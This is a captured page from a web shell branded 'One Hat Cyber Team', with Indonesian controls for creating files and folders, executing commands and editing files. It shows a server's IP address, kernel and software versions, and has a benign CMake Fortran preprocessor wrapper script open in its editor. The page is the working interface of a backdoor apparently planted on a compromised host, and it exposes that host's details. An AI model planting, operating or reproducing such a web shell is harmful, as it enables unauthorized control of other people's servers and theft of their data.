⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
cmake
/
Modules
/
Compiler
/
XL-Fortran
/
Edit File: cpp
#!/usr/bin/env bash # Source file. src="$(printf %q "$1")" shift # Output file the compiler expects. out="$(printf %q "$1")" shift # Create the file the compiler expects. It will check syntax. >"$out" cpp='cpp' opts='' while test "$#" != 0; do case "$1" in # Extract the option for the path to cpp. --cpp) shift; cpp="$(printf %q "$1")" ;; # Extract the option for our own output file. --out) shift; out="$(printf %q "$1")" ;; # Collect the rest of the command line. *) opts="$opts $(printf %q "$1")" ;; esac shift done # Execute the real preprocessor tool. eval "exec $cpp $src $out $opts"
Simpan